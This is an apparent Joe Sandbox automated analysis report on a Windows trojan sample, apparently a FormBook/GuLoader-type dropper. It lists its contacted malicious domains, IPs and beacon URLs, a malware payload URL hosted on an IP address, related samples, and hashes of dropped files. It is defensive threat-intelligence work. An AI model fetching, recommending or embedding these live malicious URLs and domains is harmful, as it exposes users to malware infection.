https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.crossdressersespana.com/be53/?oT5=MQi5ASxzFfNSWJAsQey1B3Zv+H04FroupisBE3nsXrFfvTv9pcCErlrODjvbeqMcqyEj&v0Dd=aPFdKLwPWjPXZR-p	0%	Avira URL Cloud	safe
http://34.138.169.8/	0%	Avira URL Cloud	safe
www.fetch-a-estudia-y-trabaja.info/be53/	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.bind(#	100%	Avira URL Cloud	malware
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binQ._	100%	Avira URL Cloud	malware
http://www.nisekopiraestate.net/be53/?oT5=4qNm2ZAzgWMrZOo7jvgkf6t6S1zohoxxGdlmv96XcHnPlRQdh59KN22s8WnNeaZqgwFd&v0Dd=aPFdKLwPWjPXZR-p	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binL/K	100%	Avira URL Cloud	malware
http://www.largesxiaothose.com/be53/?oT5=b4uU6M+WZucAv+WJidAYZIorFrJJQB5N2eWFLX1uWjj6vvX3SZY9fvZVqnoqYhBOrIG3&pZbp=3fZ0Ch7PbvU	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
webredir.vip.gandi.net	217.70.184.50	true	false		high
www.embhajeflexiveis.com	103.169.142.0	true	true	1%, Virustotal, Browse	unknown
www.crossdressersespana.com	217.160.0.102	true	true	1%, Virustotal, Browse	unknown
www.largesxiaothose.com	156.246.142.1	true	true		unknown
www.1wisas.top	190.115.19.43	true	true		unknown
parkingpage.namecheap.com	198.54.117.216	true	false		high
www.2004256.com	160.124.149.176	true	true		unknown
freightbyu.com	76.223.105.230	true	true		unknown
www.enjoythearoma.com	35.208.230.52	true	true		unknown
gota-africana.top	162.241.203.15	true	true		unknown
www.cristianlealojeda.com	156.251.235.194	true	true		unknown
ssl1.prod.systemdragon.com	104.17.158.1	true	true		unknown
www.icolut.xyz	172.67.140.128	true	true		unknown
www.keyofcaiyla.com	unknown	unknown	true		unknown
www.kash-fitness.com	unknown	unknown	true		unknown
www.freightbyu.com	unknown	unknown	true		unknown
www.gota-africana.top	unknown	unknown	true		unknown
www.akseki.net	unknown	unknown	true		unknown
www.immortal-civilization.com	unknown	unknown	true		unknown
www.nisekopiraestate.net	unknown	unknown	true		unknown
www.josephajaogo.africa	unknown	unknown	true		unknown
www.fetch-a-estudia-y-trabaja.info	unknown	unknown	true		unknown
www.arctiquevarare.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.fetch-a-estudia-y-trabaja.info/be53/?oT5=yK7OrObBKTGz0pPpQHDZ1Ug64ujsVcJjhTRwQrEw26qJt5FpmjfB1P4zEa5Vqv0dsIGr&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.bin	true	Avira URL Cloud: malware	unknown
http://www.enjoythearoma.com/be53/?oT5=RF7sC7z4FipVNmwbw+jPCmgIeBX2AJ2lmBul9Kk5zXkXtv+ecrMoeWKP8G+1HCfitgV0&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: safe	unknown
http://www.embhajeflexiveis.com/be53/?oT5=aYnY9ags8h7dJGIqJu8WrtwFY6Xckqfyut2fSd51fLqlVrU9YICaztEIWdsYD/JWvyc3&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: safe	unknown
http://www.2004256.com/be53/?oT5=AooPDu4QOB27lZfkSgAw9MoUMoboYKOvBuVKrBFHr89pQNaRTMdrm8d0/nwlB7CJGzGJ&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: safe	unknown
http://www.icolut.xyz/be53/?oT5=s1julRGmed5yUPqy1/u/CkIYofLXefI1rcsRJX7fFh3jFZdFBAK63iIEYWpG9dFdYT7A&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: phishing	unknown
http://www.arctiquevarare.com/be53/?oT5=INULBbnUeQ+YoPWvOon16eoyazYMd+BlZq05NDhrWdwyda5UeJingftxUrbq982m+Gct&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: safe	unknown
http://www.1wisas.top/be53/?oT5=h5pbAFevEiRk+Avdv7HqEwAnW0lU2xxIsSfcH8MPtJpxQdX8NQy8CxMG+zlahwfzy/4y&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: phishing	unknown
www.fetch-a-estudia-y-trabaja.info/be53/	true	Avira URL Cloud: safe	low
http://www.freightbyu.com/be53/?oT5=sQvIjz7Dk+mkzHCVj0e0mbJWFXTK4edtAvhtCoD78Nc3iBQtlhdxvYB5uNMhFvAqrChT&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: safe	unknown
http://www.crossdressersespana.com/be53/?oT5=MQi5ASxzFfNSWJAsQey1B3Zv+H04FroupisBE3nsXrFfvTv9pcCErlrODjvbeqMcqyEj&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: safe	unknown
http://www.nisekopiraestate.net/be53/?oT5=4qNm2ZAzgWMrZOo7jvgkf6t6S1zohoxxGdlmv96XcHnPlRQdh59KN22s8WnNeaZqgwFd&v0Dd=aPFdKLwPWjPXZR-p	true	Avira URL Cloud: safe	unknown
http://www.largesxiaothose.com/be53/?oT5=b4uU6M+WZucAv+WJidAYZIorFrJJQB5N2eWFLX1uWjj6vvX3SZY9fvZVqnoqYhBOrIG3&pZbp=3fZ0Ch7PbvU	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binO	hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	hi38VYWujz.exe, 0000000B.00000001.44920374076.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	hi38VYWujz.exe, 0000000B.00000001.44920374076.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/	hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.bind(#	hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binQ._	hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nsis.sf.net/NSIS_ErrorError	hi38VYWujz.exe, 00000006.00000000.44360903353.000000000040A000.00000008.00000001.01000000.00000004.sdmp, hi38VYWujz.exe, 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmp, hi38VYWujz.exe, 0000000B.00000000.44918585581.000000000040A000.00000008.00000001.01000000.00000004.sdmp	false		high
http://www.gopher.ftp://ftp.	hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binL/K	hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
35.208.230.52	www.enjoythearoma.com	United States	19527	GOOGLE-2US	true
76.223.105.230	freightbyu.com	United States	16509	AMAZON-02US	true
156.251.235.194	www.cristianlealojeda.com	Seychelles	40065	CNSERVERSUS	true
217.160.0.102	www.crossdressersespana.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
103.169.142.0	www.embhajeflexiveis.com	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
172.67.140.128	www.icolut.xyz	United States	13335	CLOUDFLARENETUS	true
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	false
190.115.19.43	www.1wisas.top	Belize	262254	DDOS-GUARDCORPBZ	true
104.17.158.1	ssl1.prod.systemdragon.com	United States	13335	CLOUDFLARENETUS	true
162.241.203.15	gota-africana.top	United States	26337	OIS1US	true
156.246.142.1	www.largesxiaothose.com	Seychelles	328608	Africa-on-Cloud-ASZA	true
34.138.169.8	unknown	United States	2686	ATGS-MMD-ASUS	true
160.124.149.176	www.2004256.com	South Africa	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
198.54.117.216	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1267197
Start date and time:	2023-07-05 14:03:19 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	hi38VYWujz.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/5@20/14
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 23.1% (good quality ratio 21.3%) Quality average: 72.5% Quality standard deviation: 30.5%
HCA Information:	Successful, ratio: 88% Number of executed functions: 60 Number of non-executed functions: 302
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, VSSVC.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.159.2, 40.126.31.73, 20.190.159.23, 40.126.31.69, 20.190.159.73, 20.190.159.71, 20.190.159.0, 20.190.159.4
Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, prdv4a.aadg.msidentity.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, 11.tlu.dl.delivery.mp.microsoft.com, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
35.208.230.52	E-dekont_pdf.exe	Get hash	malicious	FormBook	Browse	www.enjoythearoma.com/be53/?qR=EPGpk&E4p=RF7sC7z4FipVNmwbw+jPCmgIeBX2AJ2lmBul9Kk5zXkXtv+ecrMoeWKP8G+1HCfitgV0
76.223.105.230	roror99043.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.teleportoverseas.com/t30k/?8pkD=9Mx8rC1iKxH6L90eK0I85d397/E4VCmWlM+antBfXSrhXvzRm4cFXRTi+27U5cx98N9M&_TAh=V48tGXVp04
	5X2kmGjAFF.exe	Get hash	malicious	FormBook	Browse	www.coquitoweek.com/gg04/?5j=GADPonH+Ffygui4vKjAqb91Y7084wgf1L0AjQREN8P650mndsRpcExVl3FoOGNlSRvD/&2dxx=-ZiTVXB0C
	Release pending Bookings.exe	Get hash	malicious	FormBook	Browse	www.4tvaccounting.com/he2a/?o0GdC=fRvmnDRQVAE457xJgiP1wdvpMJpoKxoIifkD3nzVpvnHuw/vKX70bic3h2+JRaztYlLn&z8ItD=LN9HzDuXkrMlBd
	Receipt.exe	Get hash	malicious	FormBook	Browse	www.4tvaccounting.com/he2a/?l8=fRvmnDRVIHA97rwz8yP1wdvpMJpoKxoIifkD3nzVpvnHuw/vKX70bic3h2eGd/HuGDHk&QH_HY=YdyLn4W8AJS
	E-dekont_pdf.exe	Get hash	malicious	FormBook	Browse	www.freightbyu.com/be53/?qR=EPGpk&E4p=sQvIjz7Dk+mkzHCVj0e0mbJWFXTK4edtAvhtCoD78Nc3iBQtlhdxvYB5uNMhFvAqrChT
	E-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.freightbyu.com/be53/?QpfD=sQvIjz7Dk+mkzHCVj0e0mbJWFXTK4edtAvhtCoD78Nc3iBQtlhdxvYB5uNMhFvAqrChT&0ro=V6LtODYPixf0Mnz0
	Payment_Remittance_Advice.exe	Get hash	malicious	FormBook	Browse	www.digitalmagazine.online/in62/?oL08=wkL4DXLi4d+t5u3R7q6hVY9p2U9Z1EXbymVUE7o0EThGgZpnUUtRQlbqvsdw7kb9tPkE&lV=0nQp2ZUp0V
	RFQ_0341101-7996.exe	Get hash	malicious	FormBook	Browse	www.singingriverhomeimprovement.com/o17i/?e8=1bB4tpd&3fGtH=w2uthiHjkglyWfxxxxCOlAQl6ZitZxU2G8YIPiOpt5FEo7NUCDIHDCC+t8c03CyNWz0IAR+cbQ==
	16F0F3DAC1F5860D2D6ED940A3C20C070E22A913A847D.exe	Get hash	malicious	Lokibot, Pony	Browse	japmotors.net/tmp/r1.php
	quotation_orda.exe	Get hash	malicious	FormBook	Browse	www.davidmchughroofing.co.uk/n13e/?5jit4HQX=By9udebX6qbNRhXpLAzU7GODIxEN4Et1oiR3PVrwCpSRyi9qF6oyrYtMrbICF4wCwQz/&a6A=8phps
	TEKLIF_FORMU_0305.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.alamut-am.com/b04s/?m48lur=5jmD&9rZP=UYGHK7YDj1Q4BjjRem12oCJSf06KSLUdheqMr17ztFsbWT/mHm3cUCREyiE+7YG4GTdn4RpQzA==
	DHL_CBJ5012315242.exe	Get hash	malicious	FormBook	Browse	www.lilablues.com/sz94/?9rwTWHR=y+EPDb8vgx5Cltd1ZwFYn0uvZViATiLCowv2atf05403T0sLcMqer42L2u146cxsSuk5&x0=4hr8-d7H6rB
	y4qbRd7teh.rtf	Get hash	malicious	FormBook	Browse	www.hatchandneststudio.com/ne28/?0nbp=INLkPwLaSE0Pf8e4sk+XnPUPakKg/Q0E+8q2ORGJ7qDmdgM/ag03xpJI3HKSujoxz/psbA==&3fB=mfM82dm8WRKt6L
	dXqQOrza1D.exe	Get hash	malicious	FormBook	Browse	www.hatchandneststudio.com/ne28/?fHSTO=INLkPwLfSD0LfsS0uk+XnPUPakKg/Q0E+8ymSSaI/KDndRg5dwl7ntxK0hGUlS86mZdb&5jlLi=n48TdfF8P8otftSp
	X8vzjJF1aT.exe	Get hash	malicious	FormBook	Browse	www.515mowandsnow.com/de08/?0vE4Zh=FZCDnH&d6=YZssu3vUaTk9pxWRLjv9N8hBDmrlPH8mJ+IT20L3X/6aszHuFtOABHgCSjxXj5kM/WCB5Fet0A==
	ZW2LxTSnR0.exe	Get hash	malicious	FormBook	Browse	www.fkbnouroushing.com/sz94/?-Z=kDTj4WYe5xRiCg0tgLsyW7+CsWVBBUJBRl4+ilOdn4tbWHNE+6n1jc8xnuVeujWQZsFpI6J1aw==&_0DH=V0G0ivu0mdeDtn
	e-dekont.exe	Get hash	malicious	FormBook	Browse	www.alamut-am.com/b04s/?dV=UYGHK7YG+yU9DzirC212oCJSf06KSLUdheqMr17ztFsbWT/mHm3cUCREyioxkt+4BlRy&3fHXCl=4hch_8lXntQpbr
	vPp1JQxTbZ.exe	Get hash	malicious	FormBook	Browse	www.amgconstruct1on.com/gtt8/?q8zhgT=-ZVdTdzpTh&xP6x6h=SaCHdGt3s26CoozLUQJPXJ02duU8bnEk618gohrLNmXxC/4uixHeXp5YIS7qv8VTpmCI
	rE-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.irestoreart.com/mi94/?q84XRrY=1jOQ3Jr5eocDUv08KXQ/tvvmF58QYiHzcU4AjsguiQtOIJEdYj1yWSkOfJSnBsy7U62P&7n-l=FJBx
	uVk9lgKUxs.exe	Get hash	malicious	FormBook	Browse	www.hvlandscapes.biz/nahb/?juwZDmqi=DEnBi5eaxLOJ8aw8m/ZHNYf6CdoAmO1Hb3mJYCkNpS8wWIGwzxN8nKwQhTdLMKAphkXmhJ19GkPip2Lw3FNwPuqlOib8Y/U5CA==&PY_3=0QY5c

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
webredir.vip.gandi.net	swift_copy.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	Order_32420_03.07.2023.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	BB7978282629227.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	PO.19062023.pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	217.70.184.50
	order_z.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	NEW_ORDER89028902.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	Receipt089838.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	0630OTT231156917.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	KD_MEDICAL_POLSKA_23053371.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	s4YvlK74zJ.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	PL59107-00.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	RFQ1123031240058.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	PO_0033S2.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	Parfumens.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	Afklde.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	file.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	invoice.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	Bemaerke.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	invoice.exe	Get hash	malicious	FormBook, Play, zgRAT	Browse	217.70.184.50
	invoice.exe	Get hash	malicious	FormBook	Browse	217.70.184.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GOOGLE-2US	https://okocm77y.page.link/dmCn	Get hash	malicious	Unknown	Browse	35.213.109.249
	https://3bxqvd16.page.link/2qXj	Get hash	malicious	Unknown	Browse	35.213.109.249
	https://lpyxsuhk.page.link/amTC	Get hash	malicious	Unknown	Browse	35.213.109.249
	https://z8jqb.app.link/kTa5IsFV2Ab	Get hash	malicious	Unknown	Browse	35.214.168.80
	mpsl-20230704-0803.elf	Get hash	malicious	Mirai, Moobot	Browse	35.208.62.232
	https://yxl5i1n2.page.link/3N7P	Get hash	malicious	Unknown	Browse	35.214.219.29
	skid.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	35.213.26.139
	https://zjgg3ko3.page.link/R6GT	Get hash	malicious	Unknown	Browse	35.208.249.213
	https://wx9lqswe.page.link/H3Ed	Get hash	malicious	Unknown	Browse	35.213.109.249
	http://r.srvtrck.com/v1/redirect?url=http%3A%2F%2Fwww.pmi.org%2F&api_key=2787b73d6d1c026b48687320e239182a&site_id=0fb9199cb9ce464f9c82523578c269b4&type=url&yk_tag=84594d11e26e500a54db53029ff8eafb	Get hash	malicious	Unknown	Browse	35.214.42.68
	https://kuqgprhp.page.link/EwdR	Get hash	malicious	Unknown	Browse	35.214.168.80
	f0Gv0ob8Bi.elf	Get hash	malicious	Mirai	Browse	35.216.46.220
	h5fsLc6LgN.elf	Get hash	malicious	Mirai	Browse	35.212.65.174
	fTT4vUoydm.elf	Get hash	malicious	Mirai	Browse	35.218.183.186
	https://zanypandafire.tumblr.com/#==gYBdFWstEZ19kQ39yaulGbuAHch5iNyQjYz8yL6MHc0RHa	Get hash	malicious	Unknown	Browse	35.214.157.39
	https://www.affaritaliani.it/	Get hash	malicious	Unknown	Browse	35.214.143.153
	http://blkslzaa.online/obufsssssssscaaatoion/	Get hash	malicious	Unknown	Browse	35.213.232.93
	https://edu365portal.com/	Get hash	malicious	Unknown	Browse	35.206.11.92
	http://slim-gum.com	Get hash	malicious	Unknown	Browse	35.214.143.66
	https://oidsjioiweoriowjdnrwi5.info/	Get hash	malicious	Unknown	Browse	35.219.166.122
AMAZON-02US	FlightAware_Flight_Tracker_v5.8.0_Full_Multilingual_AdFree.apk	Get hash	malicious	Unknown	Browse	52.94.223.167
	https://okocm77y.page.link/dmCn	Get hash	malicious	Unknown	Browse	18.192.138.207
	FlightAware_Flight_Tracker_v5.8.0_Full_Multilingual_AdFree.apk	Get hash	malicious	Unknown	Browse	52.46.151.131
	x86_64-20230705-0950.elf	Get hash	malicious	Mirai, Moobot	Browse	52.36.218.26
	https://pub-847389e8d4534fc8b9e612bd5b8905ac.r2.dev/Ala1.htm?email=mihir.shukla@automationanywhere.com	Get hash	malicious	HTMLPhisher	Browse	13.224.98.49
	https://fleek.ipfs.io/ipfs/QmYhBuNJCPABaKZhDRsENDx3xAg2vabsp7aqujpYppvRU9?filename=Mail.html#flkkrp@edle-phd.eu	Get hash	malicious	HTMLPhisher	Browse	18.155.129.125
	arm-20230705-0951.elf	Get hash	malicious	Mirai, Moobot	Browse	18.223.79.201
	arm5-20230705-0950.elf	Get hash	malicious	Mirai, Moobot	Browse	18.131.119.80
	arm-20230705-0950.elf	Get hash	malicious	Mirai, Moobot	Browse	44.243.245.77
	mips-20230705-0925.elf	Get hash	malicious	Unknown	Browse	54.178.85.106
	armv7l-20230705-0925.elf	Get hash	malicious	Unknown	Browse	54.119.199.9
	https://3bxqvd16.page.link/2qXj	Get hash	malicious	Unknown	Browse	34.252.187.121
	mipsel.elf	Get hash	malicious	Unknown	Browse	108.159.91.92
	armv6l.elf	Get hash	malicious	Unknown	Browse	108.157.2.214
	armv5l.elf	Get hash	malicious	Unknown	Browse	54.177.215.135
	http://links.engage.ticketmaster.com/ctt?m=9670224&r=NjIxOTEyMTA5MjExS0&b=0&j=MTc4MDA1Mjk2OAS2&k=Link-0&kx=1&kt=1&kd=https%3A%2F%2Fhx5g6s.codesandbox.io?tickets=YW9zdHJpcm92QGJlbHpvbmEuY29t	Get hash	malicious	Unknown	Browse	52.60.182.80
	i686.elf	Get hash	malicious	Unknown	Browse	34.211.52.182
	https://d1m1511i74zbdu.cloudfront.net/latest/de/v8.844.38.98.59	Get hash	malicious	Unknown	Browse	108.139.241.76
	https://protect-za.mimecast.com/s/XzvjCwjggVFkkBoptVY9GT?domain=cloudpdf.io	Get hash	malicious	HTMLPhisher	Browse	76.76.21.93
	https://revistarotaryperu.com/xx/GB29JPJQ14557430767001/dmFuLnJvc3N1bS5qYW5AZGVtZS1ncm91cC5jb20=	Get hash	malicious	Unknown	Browse	108.139.241.126

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll	STS-QP-18-01-D.doc.exe	Get hash	malicious	GuLoader	Browse
	STS-QP-18-01-D.doc.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan.NSIS.Agent.22628.17291.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan.NSIS.Agent.22628.17291.exe	Get hash	malicious	GuLoader	Browse
	iR7XrRSd21.exe	Get hash	malicious	Remcos, GuLoader	Browse
	5HoWa3IFSq.exe	Get hash	malicious	GuLoader	Browse
	uB6mPXoyst.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	iR7XrRSd21.exe	Get hash	malicious	GuLoader	Browse
	5HoWa3IFSq.exe	Get hash	malicious	GuLoader	Browse
	uB6mPXoyst.exe	Get hash	malicious	GuLoader	Browse
	TM001829.exe	Get hash	malicious	Azorult, GuLoader	Browse
	6yp4a0kNOX.exe	Get hash	malicious	Azorult, GuLoader	Browse
	TM001829.exe	Get hash	malicious	GuLoader	Browse
	6yp4a0kNOX.exe	Get hash	malicious	GuLoader	Browse
	Products_specifications.doc.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Products_specifications.doc.exe	Get hash	malicious	GuLoader	Browse
	PURCHASE_ORDER.xls	Get hash	malicious	GuLoader	Browse
	DOCS-INV.PKL-778012DHL-PARCEL_INFO.exe	Get hash	malicious	GuLoader	Browse
	DOCS-INV.PKL-778012DHL-PARCEL_INFO.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen\pvscsi.cat

Download File

Process:	C:\Users\user\Desktop\hi38VYWujz.exe
File Type:	data
Category:	dropped
Size (bytes):	10341
Entropy (8bit):	7.119651525501671
Encrypted:	false
SSDEEP:	192:gH2mJZXooyKfPFWQFCFk180Hy5qnajWsxFIB:+PrPFRT1slxxFIB
MD5:	55C39F914A45AB7D09650654C3D1D56C
SHA1:	079A9E7A603A60CB7E858AA0889F1C3AE863A77A
SHA-256:	FC653560D0D31C6C0E795068EE4D6B0E02CE3AB9A8AC183E54528DAA5712E1D1
SHA-512:	D68ECAD500004B38613EAD14E5C1C5DEB6F49BDE3894A43DBCCC3023C5B8F7E04C5AF59498A9B120C94888D5C5210E882996A9F61159C94CF3D1C755D065D00F
Malicious:	false
Preview:	0.(a...H........(R0.(N...1.0...`.H.e......0..3..+.....7.....$0.. 0...+.....7........\|. .B..=.FN...210506193917Z0...+.....7.....0...0.... ..j.....1vn..".\zd.5u.W.h.g..3'1..0...+.....7...1...08..+.....7...10(...F.i.l.e........p.v.s.c.s.i...s.y.s...0L..+.....7...1>0<...O.S.A.t.t.r.......&2.:.6...2.,.2.:.6...3.,.2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j.....1vn..".\zd.5u.W.h.g..3'0.........t.l..6.....]...1..0...+.....7...1...08..+.....7...10(...F.i.l.e........p.v.s.c.s.i...i.n.f...0L..+.....7...1>0<...O.S.A.t.t.r.......&2.:.6...2.,.2.:.6...3.,.2.:.1.0...0...0.... Y.+.....8I.l.^.$.+...2.3:....1..0...+.....7...1...08..+.....7...10(...F.i.l.e........p.v.s.c.s.i...i.n.f...0L..+.....7...1>0<...O.S.A.t.t.r.......&2.:.6...2.,.2.:.6...3.,.2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... Y.+.....8I.l.^.$.+...2.3:....0....s..:Z.&\K7...9......1..0...+.....7...1...08..+.....7...1*0(...F.i.l.e........p.v.s.c.s.i...s.y.s...0L..+....

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Longtail.Ver

Download File

Process:	C:\Users\user\Desktop\hi38VYWujz.exe
File Type:	data
Category:	dropped
Size (bytes):	169262
Entropy (8bit):	4.592026971809892
Encrypted:	false
SSDEEP:	1536:G407IlrEdZudfdu4rY6Oc4kBAvsn30mULMH8RljP8BmmqiYm4TulSLxdcdCFG:z1uZudfdwRk2veq4ulb8CiYjqmcdH
MD5:	8E9A9206B84A2F38265BDA17D4FBD12E
SHA1:	82A72DDCECB957927850643D6CB1ED7102C20760
SHA-256:	F89221D0FA9953AE7DDBA7756F13C11F292FAEABD2A70DDF6B99CF227B24F6F0
SHA-512:	65619D95B86249BCA259A43E22D1C653FEE1373B1E2616B8F59BCDE52C81854B63CEDE1C4752BE7BB42D3FD29FEAD4D0C2F7C014DF055E30536B5CF2C8FDF84A
Malicious:	false
Preview:	..........D......%%%.{{...L..........E...................--.........((...... ..F.../.................RRRRRR../............N.........P.......l..H.....)...0.ZZ..^..........a.....................55...........}}.............F...6.III...b.g...."""...................@...JJJJJ.................j......>...........b......%...hhhhhhh.......R..................................................AA.........00................................=..........................................e...KK.....................555...``.....jjj.......................&&&..............."".D........(.........::::....................................yy...{{.......__.......66...44.E...........0.......w.mm.cc..{{{...11....ll...........\|\|\|\|\|\|.................................@@@..........y...:::::......................t.....*..22................f.......................pp..y..........H.77.................))..+.(..\|\|..........................GGG............................................%%.....0...9...............HH.......KKK..!.

